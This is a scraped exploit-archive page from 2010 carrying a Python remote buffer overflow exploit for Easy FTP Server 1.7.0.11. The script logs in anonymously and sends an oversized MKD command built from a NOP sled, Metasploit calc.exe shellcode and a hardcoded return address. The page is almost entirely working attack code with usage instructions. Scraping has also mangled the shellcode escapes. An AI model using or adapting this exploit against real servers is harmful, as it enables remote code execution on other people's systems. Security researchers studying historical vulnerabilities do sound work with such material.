Easy FTP Server v1.7.0.11 MKD Command Remote Buffer Overflow
Posted on 17 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Easy FTP Server v1.7.0.11 MKD Command Remote Buffer Overflow Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================================================ Easy FTP Server v1.7.0.11 MKD Command Remote Buffer Overflow Exploit (Post Auth) ================================================================================ #!/usr/bin/python import socket,sys # Tested on XP Pro SP2 [ Eng ] and XP Pro SP3 [ Eng ] print """ # **************************************************************************** # # * Easy FTP Server v1.7.0.11 [MKD] Remote BoF Exploit Post Authentication * * Author / Discovered by : Karn Ganeshen * * Date : July 5, 2010 * * KarnGaneshen [aT] gmail [d0t] com * * http://ipositivesecurity.blogspot.com * # # **************************************************************************** # """ if len(sys.argv) != 3: print "Usage: ./easyftp_mkd.py <Target IP> <Port>" sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) # Buffer needed -> 272 bytes # Metasploit Shellcode PoC - Calc.exe [ 228 bytes ] [ shikata_ga_nai - 1 iteration ] [ badchars x00x0ax2fx5c ] shellcode = ("xdaxc0xd9x74x24xf4xbbxe6x9axc9x6dx5ax33xc9xb1" "x33x31x5ax18x83xeaxfcx03x5axf2x78x3cx91x12xf5" "xbfx6axe2x66x49x8fxd3xb4x2dxdbx41x09x25x89x69" "xe2x6bx3axfax86xa3x4dx4bx2cx92x60x4cx80x1ax2e" "x8ex82xe6x2dxc2x64xd6xfdx17x64x1fxe3xd7x34xc8" "x6fx45xa9x7dx2dx55xc8x51x39xe5xb2xd4xfex91x08" "xd6x2ex09x06x90xd6x22x40x01xe6xe7x92x7dxa1x8c" "x61xf5x30x44xb8xf6x02xa8x17xc9xaax25x69x0dx0c" "xd5x1cx65x6ex68x27xbex0cxb6xa2x23xb6x3dx14x80" "x46x92xc3x43x44x5fx87x0cx49x5ex44x27x75xebx6b" "xe8xffxafx4fx2cx5bx74xf1x75x01xdbx0ex65xedx84" "xaaxedx1cxd1xcdxafx4ax24x5fxcax32x26x5fxd5x14" "x4ex6ex5exfbx09x6fxb5xbfxe5x25x94x96x6dxe0x4c" "xabxf0x13xbbxe8x0cx90x4ex91xebx88x3ax94xb0x0e" "xd6xe4xa9xfaxd8x5bxcax2exbbx3ax58xb2x12xd8xd8" "x51x6bx28") nopsled = "x90" * 40 ret = "x10x3Bx88�0" # MAGIC RET 00883B10 (SP2) / 00893B58 (SP3) [ EBP points to nopsled when overflowed ] payload = nopsled + shellcode + ret print "[+] Launching exploit against " + target + "..." s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: connect=s.connect((target, port)) print "[+] Connected!" except: print "[!] Connection failed!" sys.exit(0) s.recv(1024) # Targetting default user 'anonymous' on the target s.send('USER anonymous ') s.recv(1024) s.send('PASS anonymous ') s.recv(1024) print "[+] Sending payload..." s.send('MKD ' + payload + ' ') print "[!] Verifying if the user has 'Create Directory' permission. This may take some time..." try: s.recv(1024) print "[!] Uhh.. User does not have MKD privilege. +++Exploit failed+++" except: print "[+] +++Exploit Successful+++ ^_^" s.close() # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-17]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
